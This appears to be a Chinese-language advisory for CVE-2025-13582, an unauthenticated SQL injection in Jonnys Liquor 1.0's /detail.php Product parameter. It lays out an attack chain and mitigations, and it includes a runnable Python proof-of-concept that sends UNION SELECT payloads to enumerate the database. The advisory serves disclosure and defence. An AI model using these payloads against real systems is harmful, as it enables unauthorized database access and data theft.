CVE-2025-13582: code-projects Jonnys Liquor 1.0 /detail.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13582

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Jonnys Liquor 1.0

漏洞概述

CVE-2025-13582是存在于code-projects开源项目Jonnys Liquor 1.0中的一个高危安全漏洞。该漏洞位于/detail.php文件的GET参数处理器中，攻击者可以通过操纵Product参数实现SQL注入攻击。由于该漏洞无需认证即可远程利用，且CVSS评分达到7.3分（高危级别），对系统安全构成严重威胁。攻击者利用此漏洞可以未经授权访问数据库，窃取敏感信息（如用户数据、财务信息、业务数据等），甚至在某些情况下可以修改或删除数据库内容，对企业业务连续性造成影响。该漏洞已被公开披露，exploit代码已在互联网流传，建议受影响用户立即采取修复措施。

技术细节

该SQL注入漏洞存在于Jonnys Liquor 1.0的/detail.php文件中的GET参数处理器。具体来说，当用户请求/detail.php页面时，程序通过GET方式接收Product参数，但未对该参数进行充分的输入验证和SQL语句参数化处理。攻击者可以在Product参数中注入恶意的SQL语句，如使用UNION SELECT、布尔盲注、时间盲注等技术从数据库中提取敏感信息。由于该参数直接拼接到SQL查询语句中，攻击者可以绕过认证机制获取数据库管理员权限。在某些配置下，攻击者甚至可以通过SELECT INTO OUTFILE等语句将恶意代码写入服务器，实现远程代码执行。CVSS 3.1向量显示该漏洞可通过网络远程利用，无需认证和用户交互，对机密性、完整性和可用性均产生低至中等程度的影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用Jonnys Liquor 1.0系统，访问/detail.php页面寻找注入点

STEP 2

步骤2: 漏洞探测

攻击者使用单引号等特殊字符测试Product参数，观察是否产生SQL错误响应

STEP 3

步骤3: SQL注入利用

通过UNION注入、布尔盲注或时间盲注技术，构造恶意SQL语句提取数据库内容

STEP 4

步骤4: 数据窃取

获取数据库中的敏感信息，包括用户凭证、财务数据、业务数据等

STEP 5

步骤5: 权限提升

在某些情况下，攻击者可能获取数据库管理员权限，进一步控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13582 PoC - SQL Injection in Jonnys Liquor 1.0 /detail.php
# Affected parameter: Product (GET)

def exploit(target_url, payload):
    """
    Exploit SQL injection vulnerability in /detail.php
    Args:
        target_url: Base URL of the vulnerable application
        payload: SQL injection payload
    Returns:
        Response content or error message
    """
    # Construct the malicious URL
    params = {'Product': payload}
    try:
        response = requests.get(f'{target_url}/detail.php', params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f'Error: {str(e)}'

def main():
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-13582.py <target_url>')
        print('Example: python cve-2025-13582.py http://localhost/JonnysLiquor')
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Basic test payload - causes SQL error revealing database info
    test_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
    
    print(f'[*] Testing CVE-2025-13582 on {target}')
    print(f'[*] Payload: {test_payload}')
    
    result = exploit(target, test_payload)
    print(f'[+] Response received (length: {len(result)} bytes)')
    
    # Database enumeration payload
    db_enum_payload = "1' UNION SELECT database(),user(),version(),4,5,6,7,8,9,10-- -"
    print(f'[*] Enumerating database info...')
    db_result = exploit(target, db_enum_payload)
    print(db_result[:500])

if __name__ == '__main__':
    main()

影响范围

code-projects Jonnys Liquor 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 在Web应用防火墙中配置规则拦截包含SQL注入特征的请求；2) 对/detail.php页面实施访问控制，限制非授权用户访问；3) 在代码层面临时添加输入过滤逻辑，使用mysqli_real_escape_string或PDO预处理语句对Product参数进行严格过滤；4) 启用数据库日志监控，及时发现异常的SQL查询行为。建议尽快升级到官方发布的安全版本以彻底消除该漏洞风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13582
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13582
3 Details https://www.cvedetails.com/cve/CVE-2025-13582/
4 VulDB https://vuldb.com/cve/CVE-2025-13582
5 Link https://code-projects.org/
6 Link https://github.com/rassec2/dbcve/issues/5
7 Link https://vuldb.com/?ctiid.333346
8 Link https://vuldb.com/?id.333346
9 Link https://vuldb.com/?submit.699554